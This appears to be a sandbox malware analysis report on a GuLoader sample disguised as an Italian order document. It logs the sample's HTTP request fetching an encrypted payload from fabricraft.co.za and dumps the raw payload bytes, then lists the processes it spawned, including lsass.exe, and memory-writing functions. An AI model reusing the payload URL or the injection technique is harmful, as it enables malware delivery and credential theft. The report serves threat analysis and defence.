2021-11-25 09:47:51 UTC	0	OUT	GET /Farmant_hhVNwJna195.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: fabricraft.co.za Cache-Control: no-cache
2021-11-25 09:47:52 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 25 Nov 2021 09:47:52 GMT Server: Apache Last-Modified: Thu, 25 Nov 2021 06:28:40 GMT Accept-Ranges: bytes Content-Length: 106560 Connection: close Content-Type: application/octet-stream
2021-11-25 09:47:52 UTC	0	IN	Data Raw: ed 7e 33 eb 0b f2 69 6c a4 98 d3 1b d6 98 37 1d 0c 20 ef 35 e8 89 f1 a3 7c 14 c7 cf a7 4d 4c e8 36 7e d8 3c cd 58 d3 5f 09 57 2e 48 ce a9 39 16 0d 52 f8 98 88 61 3a 2d e3 5b 64 93 4c a9 6d 0c 86 ff aa fd f5 30 7d b5 cd b2 9c f9 c3 d5 57 4c b4 75 04 bc 04 97 ae 74 53 9d 58 ce 61 2f 31 8a e6 bf e3 93 25 c3 df 62 57 45 6f 2a 2f 30 1f c8 c3 e1 2c 16 ef 74 29 5e f0 1f ee bb 72 4a 9a 4a c2 b7 bd 80 5d 1f 1a bc ef 13 b2 80 49 64 aa ec b9 23 69 8f 5b 4d 69 24 15 f9 fa 5e a8 c4 a7 b6 5a 46 e6 9a cf fb 29 ae f4 d0 18 ce 7e 25 97 49 ef a8 e3 9a c4 06 84 9e a5 45 db 8c 94 af 81 6b 37 3b b7 bc fe 89 11 d0 e1 ed 9b 5e ba be 9a 73 ce 69 5c 98 ce de a1 eb c5 33 75 53 df 76 c4 dd 34 2f ca 7c 23 2c 76 f7 88 52 15 90 ec df 96 ea c9 7b 97 b8 f6 cc fe 5b e3 24 9b 35 7f af 15 Data Ascii: ~3il7 5\|ML6~<X_W.H9Ra:-[dLm0}WLutSXa/1%bWEo*/0,t)^rJJ]Id#i[Mi$^ZF)~%IEk7;^si\3uSv4/\|#,vR{[$5
2021-11-25 09:47:52 UTC	8	IN	Data Raw: 21 68 b1 cb d4 a1 48 4c 09 ba bc 99 8b cc a9 5f 66 b5 d3 15 ce b9 70 ee 6a 94 11 4a 96 2d 04 7f 52 c9 2c 88 5b 51 e3 c4 b2 3e 77 31 63 92 2b c1 23 9c a9 00 c5 7b 17 56 56 96 c5 e4 37 c9 9c 9a 0e 78 5f c8 c2 7c 58 e4 0b 91 3c 29 49 a9 cc 8c db 0e 4f b8 92 a8 a4 20 ad b1 b6 da c9 e0 79 30 a2 f0 36 95 10 dd 90 86 e8 78 a7 18 76 70 fb 38 9a 32 50 1c 10 fa 59 79 fa c6 df a6 47 60 50 0f a7 be 75 4e 0d 09 82 19 60 ed 1a 51 96 99 9b 35 b6 f2 c8 f2 02 59 d1 64 70 d7 43 62 f2 5c d6 11 38 07 e4 13 ae 33 68 55 1e 54 0d c1 b8 a4 ca 90 62 d7 0d 4b 2d d0 60 31 7c fe 01 50 b9 24 13 92 91 1c 28 fa 54 e4 ae 86 a9 d2 74 0a e2 ee 66 48 63 d9 66 19 d5 d7 73 aa 32 ad 65 e6 47 0c 50 4f fb 64 5c 02 f2 f8 81 b0 e9 73 56 1e 59 fb 13 46 9c 46 8a 12 2f 91 f0 6c 3e 10 1f be f6 a5 f8 Data Ascii: !hHL_fpjJ-R,[Q>w1c+#{VV7x_\|X<)IO y06xvp82PYyG`PuN`Q5YdpCb\83hUTbK-`1\|P$(TtfHcfs2eGPOd\sVYFF/l>
2021-11-25 09:47:52 UTC	15	IN	Data Raw: b6 4e db 15 f4 c1 27 a1 f8 14 95 b4 9a 7d f6 9c e9 4e 84 20 58 98 4a 6b ee c1 57 c9 aa 75 a2 75 6b 3a 17 c5 76 29 76 f8 79 08 ec f4 7f a4 49 e6 c9 eb f4 03 a8 96 07 6f 03 a8 5e e4 78 ff 66 0f c2 f8 02 f8 ca 42 9c fb 56 0b da 7e 5f 52 0e 61 a8 0e 03 fc 6f 9f 97 93 f8 e8 f4 99 15 d8 57 dc 3a ab 79 f5 87 87 1a 7f a3 4b 3f c1 a4 46 51 eb aa 4b 9a 3d c3 ae 12 5d 1b b2 24 c8 91 c8 ff a0 8a d5 2c 68 6a 75 b8 d9 14 bc 27 38 d6 1f a6 bb 9b 9c 2d a9 e8 b1 02 ea 0a 12 cb a0 1c 86 ec d9 4a d5 69 60 29 86 8a 7a f3 e7 e3 d7 15 9f 51 aa 66 4e 16 f3 28 43 2f 1a 9c 9f e5 33 db ca a7 0b 72 2f a2 41 06 6a 42 57 b3 ee 04 2c e3 e4 b1 4c 1d 49 b8 db 45 5f 15 55 df ba 9a fb 6c 89 59 c3 47 7a 38 a0 5d 2f 87 21 dc b8 d3 bd 82 c0 c2 e6 f4 1f 3f 3a b3 3a 71 f0 02 42 63 2a 56 7e b0 Data Ascii: N'}N XJkWuuk:v)vyIo^xfBV~_RaoW:yK?FQK=]$,hju'8-Ji`)zQfN(C/3r/AjBW,LIE_UlYGz8]/!?::qBc*V~
2021-11-25 09:47:52 UTC	23	IN	Data Raw: 1a 32 73 ea 7e 6a 13 e0 7b 55 09 15 32 79 51 18 eb 63 e0 4b eb 5f f9 ed e9 48 19 0b 57 fb 31 47 34 14 bf d7 20 fa f2 7e e4 7d b5 c9 d8 fc 74 79 ae 58 1b cc 1f 04 ec 62 98 bd f1 6f 62 a7 31 89 86 f0 75 19 d5 e3 f9 4d 4e 5a 1e a8 ba 90 b3 7d 60 e0 bd 3f 1e 59 ee bc 9c 49 53 f0 1f 6d 7f aa cf 5a 45 44 30 07 8e 5d 28 2c 71 bb a4 db dc 86 45 fe 6c 70 8c b6 00 a2 57 02 bd 66 1f af 31 44 2c d9 db 2e 66 d4 00 d8 61 88 1c 2b 46 2f 67 3d 65 73 2c 56 9e 1e ad ba 80 8e 97 47 dc 89 dc 6b da 61 94 8e 2a 9c aa 64 28 07 7d ea 85 91 76 f2 6a c2 55 40 36 8c 99 b8 37 43 cf 0a 9e 36 fc 55 da 59 35 09 06 57 df a6 82 60 5a 34 a6 f6 3f 67 73 0b 02 ad 5c d4 e5 f9 a0 f8 7d 2f 0c 91 ed fa 80 d1 96 d7 22 07 5c 87 b3 f5 42 82 cf 78 1a bf 18 21 43 9f b4 1a b2 3a 9e b9 af f0 5f e6 45 Data Ascii: 2s~j{U2yQcK_HW1G4 ~}tyXbob1uMNZ}`?YISmZED0](,qElpWf1D,.fa+F/g=es,VGka*d(}vjU@67C6UY5W`Z4?gs\}/"\Bx!C:_E
2021-11-25 09:47:52 UTC	31	IN	Data Raw: 89 a1 ab 99 7f 3b a4 81 c8 57 99 7d d3 a2 94 5d 5a 22 8b 84 8d d2 6d c0 7d 9d 53 f0 4c ed 52 ac eb e7 ad 47 a5 0a 43 66 f8 ce 53 7e eb da 06 ba e4 72 27 59 5c 8b 11 14 54 7e bf 89 b3 d2 80 a6 33 41 b0 8a 5e 3a b4 3a 12 0f 7a e1 58 fb e7 f2 b0 97 a5 4d a8 0e 6b b0 ad d2 a5 de 10 9a a0 27 79 58 f5 4c b2 f0 05 eb dc 93 98 fe a0 ab e4 3f ac ac 9a 52 a6 50 0e 6b 50 a9 7a 6f 48 f6 e2 54 62 d4 19 2c 6e a2 20 7b a0 5c 97 51 f9 05 80 c0 0e 2e 26 43 62 ad 74 e9 25 90 e6 55 32 47 10 4a ee ff c0 4f 11 3f 52 18 53 b1 e3 a4 62 14 38 06 92 b0 db 40 2a b9 52 11 32 91 38 c9 8d ef 1d 95 1d a6 fd b0 36 aa b7 88 58 53 6f 9e 58 6c f1 60 c1 bb 96 d9 05 01 1a 7a 02 c2 fe e2 b5 5a 88 b1 88 f6 ae fb 10 be 04 e2 53 cb 2e f0 55 06 0b f0 3c 82 e5 b4 5f ec 9c 66 fa 62 37 30 b9 0b 4a Data Ascii: ;W}]Z"m}SLRGCfS~r'Y\T~3A^::zXMk'yXL?RPkPzoHTb,n {\Q.&Cbt%U2GJO?RSb8@*R286XSoXl`zZS.U<_fb70J
2021-11-25 09:47:52 UTC	39	IN	Data Raw: 78 b7 b5 20 50 41 0b f8 be 4c ca fa da b8 3a 74 9a 76 a2 3f 40 d6 ab c4 15 7c a5 60 8e 1e 70 ee 36 77 0e 14 78 a0 ec fc 60 58 9a 47 d9 ae 84 c2 0a 27 48 ea e0 8c 4c ae 40 5d 12 ab 6f 69 a4 8a d4 cd 23 d4 00 29 70 bf 59 a8 5b 32 1c 29 d1 d9 e2 f8 11 83 93 a9 23 07 40 61 2d 31 17 c5 18 23 3a 86 66 25 ad 22 d9 58 53 8d bb 6e 05 b9 0b 0c bd a7 2b 77 a3 71 b6 2e 0f ec 92 80 da 42 98 20 a7 26 a4 bc f1 2f 62 35 f4 95 bd 5e e3 be 21 3c 77 64 9b d9 e0 45 19 20 48 dd 6c 29 c1 a3 9a 3e e8 c4 a1 55 4f af 32 0e 2f 2b fe fd 47 0a 5a de 01 37 c2 95 e4 e0 ae ce ff 1f 47 00 b9 f0 48 24 57 32 d0 17 86 2c e1 43 9c dc b5 81 f6 ed b7 ca 7f 9b 01 2c 5d a9 92 16 80 ee b7 72 f3 00 71 d6 74 ce 03 7c 4c 37 96 4c a7 55 4f 25 66 4c 8d 4e 33 96 85 48 4f 21 15 8c 9c 77 b6 a0 c0 b0 d0 Data Ascii: x PAL:tv?@\|`p6wx`XG'HL@]oi#)pY[2)#@a-1#:f%"XSn+wq.B &/b5^!<wdE Hl)>UO2/+GZ7GH$W2,C,]rqt\|L7LUO%fLN3HO!w
2021-11-25 09:47:52 UTC	47	IN	Data Raw: dc 58 26 15 75 31 8a 65 7b ef 50 70 48 33 e3 bb f1 6f 2a 2f 63 49 37 b6 e9 1f e0 28 f1 59 a1 0f e0 f3 17 2a b2 5d cf b8 57 f8 71 8e 13 5b 4f 09 2e cb 33 7b ba b6 f9 ee 5a 8e 7a 55 dd f1 a9 16 93 07 1b 0e ef 49 3f 49 e7 87 38 aa 0d bb 72 c7 1c b1 ab b2 da bd 87 cd 00 c2 73 e5 4a 9c 79 46 00 4b f7 80 23 64 ac be 62 84 04 7b e4 c0 38 f1 cf 73 25 d5 d5 c9 42 68 c8 cf be 80 37 17 0f 8e 4c 31 39 10 7e e2 d0 27 72 14 94 02 89 e5 ab 7d a7 a3 91 cd 06 41 4f 86 92 31 10 03 61 0a 31 27 44 8f 40 59 83 c4 d3 e4 6f 9f 6c 06 ff f5 1a f8 af a0 38 90 b4 ff 93 6f 2a d7 bf f4 0f 4c 2e fa 10 de ff 74 58 5a c6 15 13 e7 fc 92 d5 9a 34 bf 20 fa fe ea f3 e7 bf ca 47 52 2d 42 3f 55 61 3f 78 1c 65 90 7d 73 42 a4 63 f2 31 27 31 2f 4f 37 4f a9 24 84 46 9b d3 23 9a 7f 3b b8 0a 96 0f Data Ascii: X&u1e{PpH3o/cI7(Y]Wq[O.3{ZzUI?I8rsJyFK#db{8s%Bh7L19~'r}AO1a1'D@Yol8o*L.tXZ4 GR-B?Ua?xe}sBc1'1/O7O$F#;
2021-11-25 09:47:52 UTC	55	IN	Data Raw: c5 c6 4d a8 a6 bf 62 a5 de e1 1e 22 05 e8 93 77 28 41 ba fa 57 37 33 3f 12 5b 08 98 3b 8e 1f 8d 20 e0 f3 51 f0 f5 58 b6 27 53 e8 9a 14 fc 30 6f 26 32 d4 7b 71 f4 f0 9c 04 d5 b8 10 83 ce 0f a8 80 b3 8b 08 85 a5 de e4 2b 01 f3 54 34 09 e1 9d 10 49 47 08 5b f5 7d c9 2e 31 12 6f ed 7f 7f 23 90 1c 03 3f 73 aa 66 39 93 c8 6a ca b7 43 24 6c 37 77 b7 07 09 32 60 de 5c 03 3d 89 2c d9 b6 1b 32 fc ba 97 a1 c3 74 f5 30 a7 10 1b c1 83 89 7e ca ed 97 01 69 b9 0f af cd 33 37 5c 71 f2 94 99 db d3 67 e9 1f 11 e0 e2 7a 0a a1 ca 29 6e 52 cb a6 b6 22 77 a5 f4 88 59 5d ec 9c d6 a4 d3 ae 46 9d 41 14 95 b4 b7 07 68 8f 6c 34 91 d7 58 b7 4f c2 d2 2c 32 b3 bd 82 b5 31 cc af b4 fa a2 6e 16 07 d3 7c 58 c3 d7 48 3f 9c 5c 41 80 10 a1 ad 37 5f dd 93 3a 19 87 00 68 8d ba 7f 74 82 2f 45 Data Ascii: Mb"w(AW73?[; QX'S0o&2{q+T4IG[}.1o#?sf9jC$l7w2`\=,2t0~i37\qgz)nR"wY]FAhl4XO,21n\|XH?\A7_:ht/E
2021-11-25 09:47:52 UTC	62	IN	Data Raw: e8 04 f4 a5 98 ef 2a d4 95 29 15 3b fd 1a 32 b9 df 76 d5 99 e2 10 ee 16 e9 2e bf f8 d5 e2 ae 60 8f fd a8 ff 37 30 99 cd 07 f4 69 60 55 c9 0d c7 12 65 2e f3 0a 39 25 b6 a9 de a1 66 56 37 35 1e da 35 1a d8 0f ce 6b 1d 4d 17 be 32 47 9a 1d 09 66 7e 18 fc a2 1c dd 03 e0 3f a4 d0 b9 f6 01 1a 12 a3 9a 5d b2 2c 32 ab 35 c8 9d aa 5b 87 2e b3 49 cd b5 42 9d cd 55 3b 67 a1 ef 63 7b d7 b1 7b 07 0f 77 ca 8d f5 55 80 b0 50 da 54 59 3c 8f 86 23 15 11 5d b8 1f 40 1f c8 6f 7f ea f2 50 48 d3 30 97 2d 11 c2 be 76 47 ab 73 55 26 e2 f8 cf f9 f0 37 33 7d 12 9c 17 8f ca aa 23 f0 a7 07 d2 53 ef 77 3f 80 30 5e 74 55 fc 8a 1b 13 21 eb 06 31 3c 7d 15 0f 9b d5 67 56 47 5e 95 13 0b 21 7b fd 9c 31 15 69 4d f3 9c 11 3a 30 57 4c 3f b5 87 78 1c d7 6d 21 98 71 32 c4 38 a4 74 82 7f 48 1a Data Ascii: *);2v.`70i`Ue.9%fV755kM2Gf~?],25[.IBU;gc{{wUPTY<#]@oPH0-vGsU&73}#Sw?0^tU!1<}gVG^!{1iM:0WL?xm!q28tH
2021-11-25 09:47:52 UTC	70	IN	Data Raw: 2b e6 a8 78 6b 25 c2 bc a6 36 ac 26 99 54 a2 2c dc d7 2c e7 79 26 be 52 c6 3b 64 5f 97 6f 1d e6 f4 76 6b f4 5d 24 f9 80 50 f4 7b 04 83 c3 bd 03 2d f8 ad 34 82 d8 78 de 93 60 ca 4e bd c9 5f 47 18 b7 2e dd f7 6b 1c 3f db 15 f5 55 71 2c 2e be 81 60 5a 5d cc ea c2 98 fe 0d ab bf 28 7e 44 85 b0 db 36 e1 4d e8 66 09 fc 06 99 c9 97 bf ec 92 65 73 f3 7d 2b a2 1e 01 a6 0c 43 e9 36 dd f1 cc 33 b9 e5 4e b3 e6 ed eb 82 38 cd 18 3e c8 39 59 6e c7 5c 74 9a d5 1d 0c 75 0b 12 81 c5 26 54 b9 cd e6 6b 6c 82 8e 34 e3 d2 ca fb 48 a1 3c 9d 08 24 c3 0e ee e1 19 1b 90 c8 77 74 90 45 3d be 24 56 37 22 61 45 23 5a 81 85 5a dd 76 7b f8 7d 09 61 56 db 10 3d 63 1d 52 0e 54 e7 ad 35 5d 06 56 e2 11 60 21 70 db 37 12 4c 4a 50 8c 3c 7f 69 bf 66 80 05 81 29 12 08 36 ad 0f c4 b2 23 f0 d7 Data Ascii: +xk%6&T,,y&R;d_ovk]$P{-4x`N_G.k?Uq,.`Z](~D6Mfes}+C63N8>9Yn\tu&Tkl4H<$wtE=$V7"aE#ZZv{}aV=cRT5]V`!p7LJP<if)6#
2021-11-25 09:47:52 UTC	78	IN	Data Raw: 2f f2 1a da 59 a5 83 16 fb 33 47 92 1b 17 43 49 bf 91 97 5b 30 05 ca 8a 64 6d 48 a8 52 b9 8b 19 23 1b 09 42 b7 a5 9a 49 8f 49 f4 da ee 36 89 83 86 b1 12 b6 8a 87 c9 a4 ae a7 46 4c 3d 0f 30 2f b9 17 14 86 9c 1b 88 fd a6 4d fe a4 21 00 f9 b3 b7 e2 de 93 06 d2 78 cd d4 c0 a9 52 a1 3e 5e 65 bc 51 ec 15 42 d1 a7 49 1f 9e 1b e9 f8 b9 d5 bc 53 cb d8 cc b1 ff af f0 3c fe c9 11 49 00 09 8e 9d 76 12 dd e7 e0 81 6a 18 07 bf 1b 16 1a 32 35 38 4f b3 09 57 44 1a e8 de c9 69 b5 31 7c 3f f3 63 d4 bb 21 10 26 97 ff 56 7e 73 a9 e6 c9 ee 2c 07 07 d4 ab c6 ab 63 b2 b5 90 0a 23 18 2a e6 88 ef 12 52 29 6d 56 80 40 5d 80 da b5 d5 53 29 1c fc e5 ec 00 77 ab 8e f3 35 49 07 8e 84 73 16 13 ac 3c 34 31 93 a3 39 f1 f9 b5 d1 3d f6 fb a3 09 d1 49 5d 87 28 40 a5 4c 5e ae 42 bf 2b ac c1 Data Ascii: /Y3GCI[0dmHR#BII6FL=0/M!xR>^eQBIS<Ivj258OWDi1\|?c!&V~s,c#*R)mV@]S)w5Is<419=I](@L^B+
2021-11-25 09:47:52 UTC	86	IN	Data Raw: 73 ad ca 67 5f 89 6e b0 58 4b ab 48 b2 9d e7 cd 02 0f 42 25 e3 92 6c db f2 bd 6d 48 1f a3 fd 01 cc 46 e9 ee 37 3d 65 62 e1 a5 a1 e0 ca 5e c4 f1 d0 62 73 70 23 cd df 67 f7 bb 3d cf e4 a1 ef 79 7a cf b1 93 46 6a 9f 81 97 b6 55 dc 70 be 1e 3c 19 8a bc 32 73 20 41 47 80 c7 01 4f a2 1c 17 df 76 77 48 5e 7e ff 2d 74 f1 10 f5 e0 b3 56 96 3f e2 ce ca fa 90 d6 72 04 fa bd 0c e7 ca f8 e3 1a 63 65 92 be 85 07 55 ec 58 a7 f0 67 fc 16 36 08 21 eb 35 f1 bf b9 19 6a 58 cc 67 60 47 75 97 0b cb d5 3a 91 f6 55 7d 95 c9 f3 9c 89 3c 5a 57 20 0c 1c 04 df 04 f6 ae 00 13 f4 58 a1 61 41 31 aa e6 ec e3 e6 25 b3 df 12 57 2a 6f 58 2f 44 1f 94 c3 91 2c 7a ef 01 29 2a f0 76 ee d7 82 64 9a 2f cc d0 07 eb 5d ab 13 5f ce d3 b3 a1 84 29 fe 84 d0 50 49 d2 29 41 0e 39 74 fa da 4b c9 cf c9 Data Ascii: sg_nXKHB%lmHF7=eb^bsp#g=yzFjUp<2s AGOvwH^~-tV?rceUXg6!5jXg`Gu:U}<ZW XaA1%WoX/D,z)vd/]_)PI)A9tK
2021-11-25 09:47:52 UTC	94	IN	Data Raw: 38 c2 62 6a 78 bf 57 ca 9f 56 1a 1d a0 81 fe b9 8f d3 d1 3c b0 67 2d 99 01 e8 d3 dd 22 89 de 58 13 ec 12 f5 94 82 86 57 55 7b 71 55 96 67 08 6e df 24 69 d3 80 6c df e8 2e 26 af df 28 ed 2b 4b 07 97 71 0c b7 e0 de 72 61 a1 5d 2d f7 d8 77 05 c4 15 2d 20 be 9f 58 30 14 93 63 9f c8 e4 fc f2 47 03 9e d7 e9 4f 49 b6 42 a6 97 73 3f e5 1d 2b d2 3a 87 20 dc a4 95 6b 95 36 1e 2d 6b 10 a8 20 c9 b9 6a 89 12 ce 34 fa 87 59 a8 9c af ad af 41 a4 e3 be 64 b8 7e 12 34 73 46 31 c8 fc 25 ba 83 2e 2b c6 f9 4d 03 d4 23 76 12 f5 92 f0 bf 80 8a 7c a4 4a 2c 01 6b cc 90 bf f7 58 93 09 70 3d da a3 7e 8d 01 13 85 c7 30 1c 77 d8 41 9f ec b9 f9 86 8e d7 01 58 83 56 da 70 af 42 96 56 a9 0f 35 1a f9 2e ad d7 e2 70 f1 90 e5 9b 52 9b 10 14 04 69 60 74 f5 46 de fb dc 17 05 30 4f b9 e4 7d Data Ascii: 8bjxWV<g-"XWU{qUgn$il.&(+Kqra]-w- X0cGOIBs?+: k6-k j4YAd~4sF1%.+M#v\|J,kXp=~0wAXVpBV5.pRi`tF0O}
2021-11-25 09:47:52 UTC	101	IN	Data Raw: d5 46 d7 d1 46 94 d0 92 77 10 e2 fd f5 a5 fd b0 de ff 7a 77 a7 0a cc 8e f9 2d f1 88 2c 45 69 26 80 c1 6e 36 54 aa fe ea bd 5a e2 b1 e0 ee 1f ba 10 56 c7 43 ac 34 ad 34 59 ee 48 0e c3 7d 0d 05 a2 13 63 8e ce 9e c8 cf 18 1f eb 6a 4b ef 6d 09 e9 e5 b1 f1 28 a7 48 17 a8 bb 4a bb 36 df 7d 4a ce 94 c5 e8 9c 2b eb 72 f8 2c 83 00 a9 96 2e b6 19 36 be 7f ef f9 c7 54 39 54 16 56 e6 78 ff 30 e7 d5 19 fd 07 41 ba c5 7e a9 7f bf 28 6c 89 5d 36 40 d6 e3 03 90 1c 53 9f 71 9d 0c ca 46 b0 8b 70 8e 5f 13 fc 6f dc fd 80 5c c6 72 3d f5 2e 48 ea a8 4b c9 c2 b6 a2 ed 28 13 4d f4 4d 51 bd d5 2b ff 29 7f 3b 02 6f de 46 ea d6 2e d0 e2 f8 59 44 16 d1 d5 f8 bf e2 51 15 7f 02 9d 5f cc 79 99 25 a2 a6 96 9f d6 0d 4d 91 fa b0 0b 0c f5 60 ae f3 55 8e 49 ad 73 c8 ca 47 5f ca 6e df 58 26 Data Ascii: FFwzw-,Ei&n6TZVC44YH}cjKm(HJ6}J+r,.6T9TVx0A~(l]6@SqFp_o\r=.HK(MMQ+);oF.YDQ_y%M`UIsG_nX&

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 4632 Parent PID: 5216

General

Start time:	10:47:06
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
Imagebase:	0x400000
File size:	164928 bytes
MD5 hash:	F5423B7A89876044078CBB68DB883AF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 8108 Parent PID: 4632

General

Start time:	10:47:28
Start date:	25/11/2021
Path:	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
Imagebase:	0x400000
File size:	164928 bytes
MD5 hash:	F5423B7A89876044078CBB68DB883AF8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: lsass.exe PID: 120 Parent PID: 8108

General

Start time:	10:47:56
Start date:	25/11/2021
Path:	C:\Windows\System32\lsass.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\lsass.exe
Imagebase:	0x7ff71ff40000
File size:	59448 bytes
MD5 hash:	15A556DEF233F112D127025AB51AC2D3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: ORDINE + DDT A.M.F SpA.exe PID: 4632 Parent PID: 5216 ORDINE + DDT A.M.F SpA.exeCOMMON

Executed Functions

Function 0227622C, Relevance: 13.0, APIs: 2, Strings: 5, Instructions: 785COMMON

Download Yara Rule

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 0-301809174
Opcode ID: a78ec1979fad319ae86ee22e71654e81c172391c2a54601237d5a8b42eec6d38
Instruction ID: 14e0f8e9191f155067c7ca148cec33c6e0b4e7980a95742f3dd098bfbe418386
Opcode Fuzzy Hash: a78ec1979fad319ae86ee22e71654e81c172391c2a54601237d5a8b42eec6d38
Instruction Fuzzy Hash: 7972EF7151838ADFDB748F74CD85BEABBA2FF55310F05812ADC899B218D3704A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0227B1EB, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 687COMMON

Download Yara Rule

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID:
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 0-301809174
Opcode ID: 414c78d7fa89eb72cf220084c65911dd919f947be4e014a7e0ab6d8e479bab57
Instruction ID: e58e4b04dbecd950424b1aa813cc15562dac3ba8826f2dda1564d571975eed7a
Opcode Fuzzy Hash: 414c78d7fa89eb72cf220084c65911dd919f947be4e014a7e0ab6d8e479bab57
Instruction Fuzzy Hash: 3C52CB72518389DFDB789F75CD857EABBA2FF55300F51422ADD899B214C3704A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02276770, Relevance: 11.2, APIs: 1, Strings: 5, Instructions: 678nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 3527976591-301809174
Opcode ID: 4cf75e8f4b7e6306bcfc413030706de87409f21ada729788cf9d92d392d82154
Instruction ID: 10b89d549cbaa2d655db0c34e371c2a5455c09be1cf2b446ef86d8b14aab899e
Opcode Fuzzy Hash: 4cf75e8f4b7e6306bcfc413030706de87409f21ada729788cf9d92d392d82154
Instruction Fuzzy Hash: CD52DB72518389DFDB748F35CD857EABBA2FF59340F51422ADD899B224C3705A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02276831, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 643nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 3527976591-301809174
Opcode ID: 4145ca35a026e410821053f5b6f8dac54fa3085eb901718999f83b0a6007933e
Instruction ID: 3cb8189638d2606b626444dde8d6de2d043c64ca4db4acfb1ced37e33a4e0baf
Opcode Fuzzy Hash: 4145ca35a026e410821053f5b6f8dac54fa3085eb901718999f83b0a6007933e
Instruction Fuzzy Hash: 7552CB72518389DFDB748F35CD857EABBA2FF59300F55422ADD899B224C3705A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 022768E9, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 614nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 3527976591-301809174
Opcode ID: b5ec2b3edff064d971f4efb6dfdfaa17538fa91533f24f6e877a80323a3b2690
Instruction ID: a253d190501ce40e5b1f40a54de7740ac4f0325de10cd96db26090733992a66b
Opcode Fuzzy Hash: b5ec2b3edff064d971f4efb6dfdfaa17538fa91533f24f6e877a80323a3b2690
Instruction Fuzzy Hash: A742BA72518389DFDB748F39CD857EABBA2FF59300F55421ADD899B224C3705A81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02276A38, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 574nativeCOMMON

Download Yara Rule

APIs

NtWriteVirtualMemory.NTDLL(?,946127F0,?,00000000,?), ref: 022777E0

Strings

#~:, xrefs: 02277158
F2x, xrefs: 02276EBF
Q(N, xrefs: 02277661
GF, xrefs: 02276CCE
?C, xrefs: 0227726C

Memory Dump Source

Source File: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: false

Yara matches

Similarity

API ID: MemoryVirtualWrite
String ID: #~:$F2x$?C$Q(N$GF
API String ID: 3527976591-301809174
Opcode ID: 71d423370a473c1b2a8518cf6dca87fb9ee14a8c63f384e1b22a270d03069cdc
Instruction ID: 5c1b3c2c869e90525b1925aab4c96ae1dda373cee1eb4d26f74f76591a3ee268
Opcode Fuzzy Hash: 71d423370a473c1b2a8518cf6dca87fb9ee14a8c63f384e1b22a270d03069cdc
